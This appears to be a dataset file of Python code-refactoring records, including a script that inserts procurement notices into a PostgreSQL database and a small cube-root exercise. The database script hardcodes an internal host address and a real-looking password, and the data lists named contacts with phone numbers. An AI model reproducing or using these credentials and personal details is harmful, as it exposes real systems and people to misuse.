1.983133919352831e-05, -1.7639524821935923e-06, -1.535159731564839e-08, 8.794413360449789e-10, 153568856127.85236, 127226107362.62663]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, 7.476241521935537e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.504298228349246e-08, 8.735477478457909e-10, 140382068840.41766, 128048566261.66084]\n\n[-9.575357968769427e-09, -1.2140137633227375e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.747166095423015e-10, -1.842789515995345e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.761484506217259e-06, -1.520980077906525e-08, 8.721578527250325e-10, 135600496522.7375, 129146670219.88675]\n\n[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, 7.449634745732176e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.735477478457909e-10, 131821303340.10287, 132556338910.10567]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.0382265280257245e-11, -1.743336316696023e-10, -1.813766783798406e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.735477478457909e-10, 129406444985.873, 132653030892.18918]\n\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7480334166671461e-06, -1.520980077906525e-08, 8.721578527250325e-10, 133865099427.32999, 140436120253.29218]\n\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.842789515995345e-15, 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 123172560507.99377, 143105235055.60883]\n\n[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 119639757591.69417, 143860615432.91846]\n\n[2.2282051950271776e-10, -1.2059133330572482e-12, -2.1171136727356646e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 119621740814.33159, 143868003797.30536]\n\n[-9.575357968769427e-09, -1.2028279049571785e-12, -2.1051647732787472e-13, 5.039644867967898e-11, -1.7558160485557454e-10, -1.842789515995345e-15, 7.430575474541962e-16, 1.9863936167468564e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.749223081325664e-10, 121395913545.80966, 144269444777.14786]\n\n[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 118220156709.2957, 145085114899.6645]\n\n[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1171136727356646e-13, 5.011120217163613e-11, -1.7471650977559177e-10, -1.8261648304268637e-15, 7.416691902768309e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 118220156709.04602, 145085114900.12366]\n\n[2.2082942462171206e-10, -1.2071709641632366e-12, -2.0913778067377877e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.5074975460776788e-08, 8.721578527250325e-10, 109968109293.02217, 145590447784.79443]\n\n[2.22213071071529e-10, -1.2059133330572482e-12, -2.1085309656936224e-13, 5.021867485100539e-11, -1.7558160485557454e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.760267738096764e-10, 111899934222.58044, 153694065180.84283]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.0866854154642685e-13, 5.011120217163613e-11, -1.766361848796505e-10, -1.8339694239958517e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.760544278271184e-10, 112511385038.11157, 154263245256.49524]\n\n[3.868816176815073e-09, -1.2030336482043862e-12, -2.1171136727356646e-13, 5.021867485100539e-11, -1.7558160485557454e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.4920809345224143e-08, 8.750599822793858e-10, 102250033424.31876, 164710456294.5225]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7478774930028702e-10, -1.82610373802557e-15, 7.452586179271996e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.4975512206722303e-08, 8.721578527250325e-10, 92516509687.73035, 170174200265.44513]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def processJson(dic):
dicobj = json.loads(dic)
print(dicobj)
for k, v in dicobj.items():
dict_tmp = {}
dict_tmp['file_name'] = k
dict_tmp['urls'] = v
print(k)
print(v)
result.append(dict_tmp)
return result
def procesV():
for i in data_list:
if 'appendix' in i.keys():
appendix = i['appendix']
if appendix != '':
fj = processJson(i['appendix'])
print(fj)
fjs = json.dumps(fj, ensure_ascii=False)
values_list.append(('testtest', fjs))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def processJson(dic):
dicobj = json.loads(dic)
print(dicobj)
for k, v in dicobj.items():
dict_tmp = {}
dict_tmp['file_name'] = k
dict_tmp['urls'] = v
print(k)
print(v)
result.append(dict_tmp)
return result
def procesV():
for i in data_list:
if 'appendix' in i.keys():
appendix = i['appendix']
if appendix != '':
fj = processJson(i['appendix'])
print(fj)
fjs = json.dumps(fj, ensure_ascii=False)
values_list.append(('testtest', fjs))
def prosql():
hostname = '172.18.11.26'
username = 'postgres'
password = 'postgres_cnhis@#$'
database = 'ai'
conn = pg.connect(database=database, user=username, password=password,
host=hostname, port='5432')
cursor = conn.cursor()
procesV()
sql = """insert into ho_sysnc_third_customer_data("purchased_project_name","fj_json")
values %s
"""
ex.execute_values(cursor, sql, values_list, page_size=10000)
conn.commit()
conn.close()
cursor.close()
if __name__ == '__main__':
prosql()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
data_list = [{'projectName': '伊犁哈萨克自治州友谊医院开发区分院保洁服务项目', 'pingmu': '服务',
'purUnit': '新疆伊犁哈萨克自治州友谊医院', 'adminiArea': '新疆维吾尔自治区', 'bulletTime':
'2020年09月02日 19:20', 'obtBidTime':
'2020年09月02日至2020年09月09日每日上午:00:00 至 12:00\xa0\xa0下午:12:00 至 23:59(北京时间,法定节假日除外)'
, 'bidDocPrice': '¥500', 'obtBidLoc': '伊宁市经济合作区福安·西城国际1416室',
'staBidTime': '', 'staLoc': '伊宁市海棠路3号州财政局办公楼附楼1层州政府采购中心 一楼招标厅',
'budget': '¥807.000000万元(人民币)', 'proContact': '胡川', 'proPhone':
'18690293446', 'purAddress': '伊宁市斯大林街92号', 'purUnitPhone':
'0999-8024023', 'agentName': '新疆诚成工程项目管理有限公司', 'agentAddress': '详见公告正文',
'agentPhone': '18690293446'}, {'projectName': '旅顺口医疗区医用氧气管道检修采购项目',
'pingmu': '服务/维修和保养服务/其他维修和保养服务', 'purUnit': '中国人民解放军联勤保障部队第九六七医院',
'adminiArea': '大连市', 'bulletTime': '2020年09月02日 19:52', 'obtBidTime':
'2020年09月02日至2020年09月07日每日上午:8:30 至 11:30\xa0\xa0下午:13:00 至 16:30(北京时间,法定节假日除外)'
, 'budget': '¥0.000000万元(人民币)', 'proContact': '廖大成,尹辉', 'proPhone':
'0411-80841295 0411-80841296', 'purAddress': '辽宁省大连市西岗区胜利路80号',
'purUnitPhone': '廖大成,尹辉 0411-80841295 0411-80841296', 'agentName':
'中国人民解放军联勤保障部队第九六七医院', 'agentAddress': '辽宁省大连市西岗区胜利路80号', 'agentPhone':
'廖大成,尹辉 0411-80841295 0411-80841296', 'appendix':
'{"2.报价书氧气管道检修.docx": "http://www.ccgp.gov.cn/oss/download?uuid=88FCEC822374C5002F6DD48B15DC44", "3.货物指标及要求氧气管道检修.docx": "http://www.ccgp.gov.cn/oss/download?uuid=2773DFCD00839B5E034DA43339EDF1"}'
}]
dict_tmp = {}
values_list = []
result = []
def processJson(dic):
dicobj = json.loads(dic)
print(dicobj)
for k, v in dicobj.items():
dict_tmp = {}
dict_tmp['file_name'] = k
dict_tmp['urls'] = v
print(k)
print(v)
result.append(dict_tmp)
return result
def procesV():
for i in data_list:
if 'appendix' in i.keys():
appendix = i['appendix']
if appendix != '':
fj = processJson(i['appendix'])
print(fj)
fjs = json.dumps(fj, ensure_ascii=False)
values_list.append(('testtest', fjs))
def prosql():
hostname = '172.18.11.26'
username = 'postgres'
password = 'postgres_cnhis@#$'
database = 'ai'
conn = pg.connect(database=database, user=username, password=password,
host=hostname, port='5432')
cursor = conn.cursor()
procesV()
sql = """insert into ho_sysnc_third_customer_data("purchased_project_name","fj_json")
values %s
"""
ex.execute_values(cursor, sql, values_list, page_size=10000)
conn.commit()
conn.close()
cursor.close()
if __name__ == '__main__':
prosql()
<|reserved_special_token_1|>
from psycopg2 import extras as ex
import psycopg2 as pg
import json
import datetime
import os
from functools import reduce
data_list = [{'projectName': '伊犁哈萨克自治州友谊医院开发区分院保洁服务项目', 'pingmu': '服务',
'purUnit': '新疆伊犁哈萨克自治州友谊医院', 'adminiArea': '新疆维吾尔自治区', 'bulletTime':
'2020年09月02日 19:20', 'obtBidTime':
'2020年09月02日至2020年09月09日每日上午:00:00 至 12:00\xa0\xa0下午:12:00 至 23:59(北京时间,法定节假日除外)'
, 'bidDocPrice': '¥500', 'obtBidLoc': '伊宁市经济合作区福安·西城国际1416室',
'staBidTime': '', 'staLoc': '伊宁市海棠路3号州财政局办公楼附楼1层州政府采购中心 一楼招标厅',
'budget': '¥807.000000万元(人民币)', 'proContact': '胡川', 'proPhone':
'18690293446', 'purAddress': '伊宁市斯大林街92号', 'purUnitPhone':
'0999-8024023', 'agentName': '新疆诚成工程项目管理有限公司', 'agentAddress': '详见公告正文',
'agentPhone': '18690293446'}, {'projectName': '旅顺口医疗区医用氧气管道检修采购项目',
'pingmu': '服务/维修和保养服务/其他维修和保养服务', 'purUnit': '中国人民解放军联勤保障部队第九六七医院',
'adminiArea': '大连市', 'bulletTime': '2020年09月02日 19:52', 'obtBidTime':
'2020年09月02日至2020年09月07日每日上午:8:30 至 11:30\xa0\xa0下午:13:00 至 16:30(北京时间,法定节假日除外)'
, 'budget': '¥0.000000万元(人民币)', 'proContact': '廖大成,尹辉', 'proPhone':
'0411-80841295 0411-80841296', 'purAddress': '辽宁省大连市西岗区胜利路80号',
'purUnitPhone': '廖大成,尹辉 0411-80841295 0411-80841296', 'agentName':
'中国人民解放军联勤保障部队第九六七医院', 'agentAddress': '辽宁省大连市西岗区胜利路80号', 'agentPhone':
'廖大成,尹辉 0411-80841295 0411-80841296', 'appendix':
'{"2.报价书氧气管道检修.docx": "http://www.ccgp.gov.cn/oss/download?uuid=88FCEC822374C5002F6DD48B15DC44", "3.货物指标及要求氧气管道检修.docx": "http://www.ccgp.gov.cn/oss/download?uuid=2773DFCD00839B5E034DA43339EDF1"}'
}]
dict_tmp = {}
values_list = []
result = []
def processJson(dic):
dicobj = json.loads(dic)
print(dicobj)
for k, v in dicobj.items():
dict_tmp = {}
dict_tmp['file_name'] = k
dict_tmp['urls'] = v
print(k)
print(v)
result.append(dict_tmp)
return result
def procesV():
for i in data_list:
if 'appendix' in i.keys():
appendix = i['appendix']
if appendix != '':
fj = processJson(i['appendix'])
print(fj)
fjs = json.dumps(fj, ensure_ascii=False)
values_list.append(('testtest', fjs))
def prosql():
hostname = '172.18.11.26'
username = 'postgres'
password = 'postgres_cnhis@#$'
database = 'ai'
conn = pg.connect(database=database, user=username, password=password,
host=hostname, port='5432')
cursor = conn.cursor()
procesV()
sql = """insert into ho_sysnc_third_customer_data("purchased_project_name","fj_json")
values %s
"""
ex.execute_values(cursor, sql, values_list, page_size=10000)
conn.commit()
conn.close()
cursor.close()
if __name__ == '__main__':
prosql()
<|reserved_special_token_1|>
from psycopg2 import extras as ex
import psycopg2 as pg
import json
import datetime
import os
from functools import reduce
data_list = [{'projectName': '伊犁哈萨克自治州友谊医院开发区分院保洁服务项目', 'pingmu': '服务', 'purUnit': '新疆伊犁哈萨克自治州友谊医院', 'adminiArea': '新疆维吾尔自治区', 'bulletTime': '2020年09月02日 19:20', 'obtBidTime': '2020年09月02日至2020年09月09日每日上午:00:00 至 12:00\xa0\xa0下午:12:00 至 23:59(北京时间,法定节假日除外)', 'bidDocPrice': '¥500', 'obtBidLoc': '伊宁市经济合作区福安·西城国际1416室', 'staBidTime': '', 'staLoc': '伊宁市海棠路3号州财政局办公楼附楼1层州政府采购中心 一楼招标厅', 'budget': '¥807.000000万元(人民币)', 'proContact': '胡川', 'proPhone': '18690293446', 'purAddress': '伊宁市斯大林街92号', 'purUnitPhone': '0999-8024023', 'agentName': '新疆诚成工程项目管理有限公司', 'agentAddress': '详见公告正文', 'agentPhone': '18690293446'}
, {'projectName': '旅顺口医疗区医用氧气管道检修采购项目', 'pingmu': '服务/维修和保养服务/其他维修和保养服务', 'purUnit': '中国人民解放军联勤保障部队第九六七医院', 'adminiArea': '大连市', 'bulletTime': '2020年09月02日 19:52', 'obtBidTime': '2020年09月02日至2020年09月07日每日上午:8:30 至 11:30\xa0\xa0下午:13:00 至 16:30(北京时间,法定节假日除外)', 'budget': '¥0.000000万元(人民币)', 'proContact': '廖大成,尹辉', 'proPhone': '0411-80841295 0411-80841296', 'purAddress': '辽宁省大连市西岗区胜利路80号', 'purUnitPhone': '廖大成,尹辉 0411-80841295 0411-80841296', 'agentName': '中国人民解放军联勤保障部队第九六七医院', 'agentAddress': '辽宁省大连市西岗区胜利路80号', 'agentPhone': '廖大成,尹辉 0411-80841295 0411-80841296', 'appendix': '{"2.报价书氧气管道检修.docx": "http://www.ccgp.gov.cn/oss/download?uuid=88FCEC822374C5002F6DD48B15DC44", "3.货物指标及要求氧气管道检修.docx": "http://www.ccgp.gov.cn/oss/download?uuid=2773DFCD00839B5E034DA43339EDF1"}'}
]
dict_tmp={}
values_list = []
result = []
def processJson(dic):
dicobj = json.loads(dic)
print(dicobj)
for k,v in dicobj.items():
dict_tmp = {}
dict_tmp["file_name"] = k
dict_tmp["urls"] =v
print(k)
print(v)
result.append(dict_tmp)
# dict_tmp.clear()
return result
def procesV():
for i in data_list:
if "appendix" in i.keys():
appendix = i["appendix"]
if appendix != "":
fj = processJson(i["appendix"])
print(fj)
fjs = json.dumps(fj,ensure_ascii=False)
values_list.append(("testtest",fjs))
def prosql():
# values 后面直接%s
hostname = '172.18.11.26'
username = 'postgres'
password = 'postgres_cnhis@#$'
database = 'ai'
conn = pg.connect(database=database, user=username, password=password, host=hostname, port="5432")
cursor = conn.cursor()
procesV()
sql = '''insert into ho_sysnc_third_customer_data("purchased_project_name","fj_json")
values %s
'''
# 其中函数中的page_size参数默认为100,表示每个statement包含的最大条目数,
# 如果传过来的argslist长度大于page_size,则该函数最多执行len(argslist)/page_size + 1次。
ex.execute_values(cursor, sql, values_list, page_size=10000)
conn.commit()
conn.close()
cursor.close()
if __name__ =='__main__':
prosql()
# procesV()
|
flexible
|
{
"blob_id": "e9af8f7830be7db3ca57b0a24de48ef7fcb08d6c",
"index": 8453,
"step-1": "<mask token>\n\n\ndef processJson(dic):\n dicobj = json.loads(dic)\n print(dicobj)\n for k, v in dicobj.items():\n dict_tmp = {}\n dict_tmp['file_name'] = k\n dict_tmp['urls'] = v\n print(k)\n print(v)\n result.append(dict_tmp)\n return result\n\n\ndef procesV():\n for i in data_list:\n if 'appendix' in i.keys():\n appendix = i['appendix']\n if appendix != '':\n fj = processJson(i['appendix'])\n print(fj)\n fjs = json.dumps(fj, ensure_ascii=False)\n values_list.append(('testtest', fjs))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef processJson(dic):\n dicobj = json.loads(dic)\n print(dicobj)\n for k, v in dicobj.items():\n dict_tmp = {}\n dict_tmp['file_name'] = k\n dict_tmp['urls'] = v\n print(k)\n print(v)\n result.append(dict_tmp)\n return result\n\n\ndef procesV():\n for i in data_list:\n if 'appendix' in i.keys():\n appendix = i['appendix']\n if appendix != '':\n fj = processJson(i['appendix'])\n print(fj)\n fjs = json.dumps(fj, ensure_ascii=False)\n values_list.append(('testtest', fjs))\n\n\ndef prosql():\n hostname = '172.18.11.26'\n username = 'postgres'\n password = 'postgres_cnhis@#$'\n database = 'ai'\n conn = pg.connect(database=database, user=username, password=password,\n host=hostname, port='5432')\n cursor = conn.cursor()\n procesV()\n sql = \"\"\"insert into ho_sysnc_third_customer_data(\"purchased_project_name\",\"fj_json\")\n values %s\n \"\"\"\n ex.execute_values(cursor, sql, values_list, page_size=10000)\n conn.commit()\n conn.close()\n cursor.close()\n\n\nif __name__ == '__main__':\n prosql()\n",
"step-3": "<mask token>\ndata_list = [{'projectName': '伊犁哈萨克自治州友谊医院开发区分院保洁服务项目', 'pingmu': '服务',\n 'purUnit': '新疆伊犁哈萨克自治州友谊医院', 'adminiArea': '新疆维吾尔自治区', 'bulletTime':\n '2020年09月02日 19:20', 'obtBidTime':\n '2020年09月02日至2020年09月09日每日上午:00:00 至 12:00\\xa0\\xa0下午:12:00 至 23:59(北京时间,法定节假日除外)'\n , 'bidDocPrice': '¥500', 'obtBidLoc': '伊宁市经济合作区福安·西城国际1416室',\n 'staBidTime': '', 'staLoc': '伊宁市海棠路3号州财政局办公楼附楼1层州政府采购中心 一楼招标厅',\n 'budget': '¥807.000000万元(人民币)', 'proContact': '胡川', 'proPhone':\n '18690293446', 'purAddress': '伊宁市斯大林街92号', 'purUnitPhone':\n '0999-8024023', 'agentName': '新疆诚成工程项目管理有限公司', 'agentAddress': '详见公告正文',\n 'agentPhone': '18690293446'}, {'projectName': '旅顺口医疗区医用氧气管道检修采购项目',\n 'pingmu': '服务/维修和保养服务/其他维修和保养服务', 'purUnit': '中国人民解放军联勤保障部队第九六七医院',\n 'adminiArea': '大连市', 'bulletTime': '2020年09月02日 19:52', 'obtBidTime':\n '2020年09月02日至2020年09月07日每日上午:8:30 至 11:30\\xa0\\xa0下午:13:00 至 16:30(北京时间,法定节假日除外)'\n , 'budget': '¥0.000000万元(人民币)', 'proContact': '廖大成,尹辉', 'proPhone':\n '0411-80841295 0411-80841296', 'purAddress': '辽宁省大连市西岗区胜利路80号',\n 'purUnitPhone': '廖大成,尹辉 0411-80841295 0411-80841296', 'agentName':\n '中国人民解放军联勤保障部队第九六七医院', 'agentAddress': '辽宁省大连市西岗区胜利路80号', 'agentPhone':\n '廖大成,尹辉 0411-80841295 0411-80841296', 'appendix':\n '{\"2.报价书氧气管道检修.docx\": \"http://www.ccgp.gov.cn/oss/download?uuid=88FCEC822374C5002F6DD48B15DC44\", \"3.货物指标及要求氧气管道检修.docx\": \"http://www.ccgp.gov.cn/oss/download?uuid=2773DFCD00839B5E034DA43339EDF1\"}'\n }]\ndict_tmp = {}\nvalues_list = []\nresult = []\n\n\ndef processJson(dic):\n dicobj = json.loads(dic)\n print(dicobj)\n for k, v in dicobj.items():\n dict_tmp = {}\n dict_tmp['file_name'] = k\n dict_tmp['urls'] = v\n print(k)\n print(v)\n result.append(dict_tmp)\n return result\n\n\ndef procesV():\n for i in data_list:\n if 'appendix' in i.keys():\n appendix = i['appendix']\n if appendix != '':\n fj = processJson(i['appendix'])\n print(fj)\n fjs = json.dumps(fj, ensure_ascii=False)\n values_list.append(('testtest', fjs))\n\n\ndef prosql():\n hostname = '172.18.11.26'\n username = 'postgres'\n password = 'postgres_cnhis@#$'\n database = 'ai'\n conn = pg.connect(database=database, user=username, password=password,\n host=hostname, port='5432')\n cursor = conn.cursor()\n procesV()\n sql = \"\"\"insert into ho_sysnc_third_customer_data(\"purchased_project_name\",\"fj_json\")\n values %s\n \"\"\"\n ex.execute_values(cursor, sql, values_list, page_size=10000)\n conn.commit()\n conn.close()\n cursor.close()\n\n\nif __name__ == '__main__':\n prosql()\n",
"step-4": "from psycopg2 import extras as ex\nimport psycopg2 as pg\nimport json\nimport datetime\nimport os\nfrom functools import reduce\ndata_list = [{'projectName': '伊犁哈萨克自治州友谊医院开发区分院保洁服务项目', 'pingmu': '服务',\n 'purUnit': '新疆伊犁哈萨克自治州友谊医院', 'adminiArea': '新疆维吾尔自治区', 'bulletTime':\n '2020年09月02日 19:20', 'obtBidTime':\n '2020年09月02日至2020年09月09日每日上午:00:00 至 12:00\\xa0\\xa0下午:12:00 至 23:59(北京时间,法定节假日除外)'\n , 'bidDocPrice': '¥500', 'obtBidLoc': '伊宁市经济合作区福安·西城国际1416室',\n 'staBidTime': '', 'staLoc': '伊宁市海棠路3号州财政局办公楼附楼1层州政府采购中心 一楼招标厅',\n 'budget': '¥807.000000万元(人民币)', 'proContact': '胡川', 'proPhone':\n '18690293446', 'purAddress': '伊宁市斯大林街92号', 'purUnitPhone':\n '0999-8024023', 'agentName': '新疆诚成工程项目管理有限公司', 'agentAddress': '详见公告正文',\n 'agentPhone': '18690293446'}, {'projectName': '旅顺口医疗区医用氧气管道检修采购项目',\n 'pingmu': '服务/维修和保养服务/其他维修和保养服务', 'purUnit': '中国人民解放军联勤保障部队第九六七医院',\n 'adminiArea': '大连市', 'bulletTime': '2020年09月02日 19:52', 'obtBidTime':\n '2020年09月02日至2020年09月07日每日上午:8:30 至 11:30\\xa0\\xa0下午:13:00 至 16:30(北京时间,法定节假日除外)'\n , 'budget': '¥0.000000万元(人民币)', 'proContact': '廖大成,尹辉', 'proPhone':\n '0411-80841295 0411-80841296', 'purAddress': '辽宁省大连市西岗区胜利路80号',\n 'purUnitPhone': '廖大成,尹辉 0411-80841295 0411-80841296', 'agentName':\n '中国人民解放军联勤保障部队第九六七医院', 'agentAddress': '辽宁省大连市西岗区胜利路80号', 'agentPhone':\n '廖大成,尹辉 0411-80841295 0411-80841296', 'appendix':\n '{\"2.报价书氧气管道检修.docx\": \"http://www.ccgp.gov.cn/oss/download?uuid=88FCEC822374C5002F6DD48B15DC44\", \"3.货物指标及要求氧气管道检修.docx\": \"http://www.ccgp.gov.cn/oss/download?uuid=2773DFCD00839B5E034DA43339EDF1\"}'\n }]\ndict_tmp = {}\nvalues_list = []\nresult = []\n\n\ndef processJson(dic):\n dicobj = json.loads(dic)\n print(dicobj)\n for k, v in dicobj.items():\n dict_tmp = {}\n dict_tmp['file_name'] = k\n dict_tmp['urls'] = v\n print(k)\n print(v)\n result.append(dict_tmp)\n return result\n\n\ndef procesV():\n for i in data_list:\n if 'appendix' in i.keys():\n appendix = i['appendix']\n if appendix != '':\n fj = processJson(i['appendix'])\n print(fj)\n fjs = json.dumps(fj, ensure_ascii=False)\n values_list.append(('testtest', fjs))\n\n\ndef prosql():\n hostname = '172.18.11.26'\n username = 'postgres'\n password = 'postgres_cnhis@#$'\n database = 'ai'\n conn = pg.connect(database=database, user=username, password=password,\n host=hostname, port='5432')\n cursor = conn.cursor()\n procesV()\n sql = \"\"\"insert into ho_sysnc_third_customer_data(\"purchased_project_name\",\"fj_json\")\n values %s\n \"\"\"\n ex.execute_values(cursor, sql, values_list, page_size=10000)\n conn.commit()\n conn.close()\n cursor.close()\n\n\nif __name__ == '__main__':\n prosql()\n",
"step-5": "from psycopg2 import extras as ex\nimport psycopg2 as pg\nimport json\nimport datetime\nimport os\nfrom functools import reduce\n\n\ndata_list = [{'projectName': '伊犁哈萨克自治州友谊医院开发区分院保洁服务项目', 'pingmu': '服务', 'purUnit': '新疆伊犁哈萨克自治州友谊医院', 'adminiArea': '新疆维吾尔自治区', 'bulletTime': '2020年09月02日 19:20', 'obtBidTime': '2020年09月02日至2020年09月09日每日上午:00:00 至 12:00\\xa0\\xa0下午:12:00 至 23:59(北京时间,法定节假日除外)', 'bidDocPrice': '¥500', 'obtBidLoc': '伊宁市经济合作区福安·西城国际1416室', 'staBidTime': '', 'staLoc': '伊宁市海棠路3号州财政局办公楼附楼1层州政府采购中心 一楼招标厅', 'budget': '¥807.000000万元(人民币)', 'proContact': '胡川', 'proPhone': '18690293446', 'purAddress': '伊宁市斯大林街92号', 'purUnitPhone': '0999-8024023', 'agentName': '新疆诚成工程项目管理有限公司', 'agentAddress': '详见公告正文', 'agentPhone': '18690293446'}\n , {'projectName': '旅顺口医疗区医用氧气管道检修采购项目', 'pingmu': '服务/维修和保养服务/其他维修和保养服务', 'purUnit': '中国人民解放军联勤保障部队第九六七医院', 'adminiArea': '大连市', 'bulletTime': '2020年09月02日 19:52', 'obtBidTime': '2020年09月02日至2020年09月07日每日上午:8:30 至 11:30\\xa0\\xa0下午:13:00 至 16:30(北京时间,法定节假日除外)', 'budget': '¥0.000000万元(人民币)', 'proContact': '廖大成,尹辉', 'proPhone': '0411-80841295 0411-80841296', 'purAddress': '辽宁省大连市西岗区胜利路80号', 'purUnitPhone': '廖大成,尹辉 0411-80841295 0411-80841296', 'agentName': '中国人民解放军联勤保障部队第九六七医院', 'agentAddress': '辽宁省大连市西岗区胜利路80号', 'agentPhone': '廖大成,尹辉 0411-80841295 0411-80841296', 'appendix': '{\"2.报价书氧气管道检修.docx\": \"http://www.ccgp.gov.cn/oss/download?uuid=88FCEC822374C5002F6DD48B15DC44\", \"3.货物指标及要求氧气管道检修.docx\": \"http://www.ccgp.gov.cn/oss/download?uuid=2773DFCD00839B5E034DA43339EDF1\"}'}\n ]\n\n\ndict_tmp={}\nvalues_list = []\nresult = []\ndef processJson(dic):\n dicobj = json.loads(dic)\n print(dicobj)\n for k,v in dicobj.items():\n dict_tmp = {}\n dict_tmp[\"file_name\"] = k\n dict_tmp[\"urls\"] =v\n print(k)\n print(v)\n result.append(dict_tmp)\n # dict_tmp.clear()\n return result\n\ndef procesV():\n for i in data_list:\n if \"appendix\" in i.keys():\n appendix = i[\"appendix\"]\n if appendix != \"\":\n fj = processJson(i[\"appendix\"])\n print(fj)\n fjs = json.dumps(fj,ensure_ascii=False)\n values_list.append((\"testtest\",fjs))\n\ndef prosql():\n # values 后面直接%s\n hostname = '172.18.11.26'\n username = 'postgres'\n password = 'postgres_cnhis@#$'\n database = 'ai'\n conn = pg.connect(database=database, user=username, password=password, host=hostname, port=\"5432\")\n cursor = conn.cursor()\n procesV()\n sql = '''insert into ho_sysnc_third_customer_data(\"purchased_project_name\",\"fj_json\")\n values %s\n '''\n # 其中函数中的page_size参数默认为100,表示每个statement包含的最大条目数,\n # 如果传过来的argslist长度大于page_size,则该函数最多执行len(argslist)/page_size + 1次。\n ex.execute_values(cursor, sql, values_list, page_size=10000)\n conn.commit()\n\n conn.close()\n cursor.close()\n\n\n\n\nif __name__ =='__main__':\n prosql()\n # procesV()\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def raizCubica(numero):
r = pow(numero, 1 / 3)
return r
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def raizCubica(numero):
r = pow(numero, 1 / 3)
return r
<|reserved_special_token_0|>
for x in range(5):
numeros.insert(x, float(input('Ingrese Numero: ')))
raices.insert(x, round(raizCubica(numeros[x]), 3))
print('Numeros: ', numeros)
print('Raices: ', raices)
<|reserved_special_token_1|>
def raizCubica(numero):
r = pow(numero, 1 / 3)
return r
numeros = []
raices = []
for x in range(5):
numeros.insert(x, float(input('Ingrese Numero: ')))
raices.insert(x, round(raizCubica(numeros[x]), 3))
print('Numeros: ', numeros)
print('Raices: ', raices)
<|reserved_special_token_1|>
def raizCubica(numero):
r = pow(numero,(1/3))
return r
numeros = []
raices = []
for x in range(5):
numeros.insert(x, float(input("Ingrese Numero: ")))
raices.insert(x, round(raizCubica(numeros[x]),3))
print("Numeros: ", numeros)
print("Raices: ", raices)
|
flexible
|
{
"blob_id": "180f7f0ade9770c6669680bd13ac8f2fd55cc8c7",
"index": 357,
"step-1": "<mask token>\n",
"step-2": "def raizCubica(numero):\n r = pow(numero, 1 / 3)\n return r\n\n\n<mask token>\n",
"step-3": "def raizCubica(numero):\n r = pow(numero, 1 / 3)\n return r\n\n\n<mask token>\nfor x in range(5):\n numeros.insert(x, float(input('Ingrese Numero: ')))\n raices.insert(x, round(raizCubica(numeros[x]), 3))\nprint('Numeros: ', numeros)\nprint('Raices: ', raices)\n",
"step-4": "def raizCubica(numero):\n r = pow(numero, 1 / 3)\n return r\n\n\nnumeros = []\nraices = []\nfor x in range(5):\n numeros.insert(x, float(input('Ingrese Numero: ')))\n raices.insert(x, round(raizCubica(numeros[x]), 3))\nprint('Numeros: ', numeros)\nprint('Raices: ', raices)\n",
"step-5": "def raizCubica(numero):\n r = pow(numero,(1/3))\n return r\n\nnumeros = []\nraices = []\n\nfor x in range(5):\n numeros.insert(x, float(input(\"Ingrese Numero: \")))\n raices.insert(x, round(raizCubica(numeros[x]),3))\n\nprint(\"Numeros: \", numeros)\nprint(\"Raices: \", raices)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from adventurelib import *
from horror import *
from dating import *
from popquiz import *
from comedy import *
from island import *
start()
|
normal
|
{
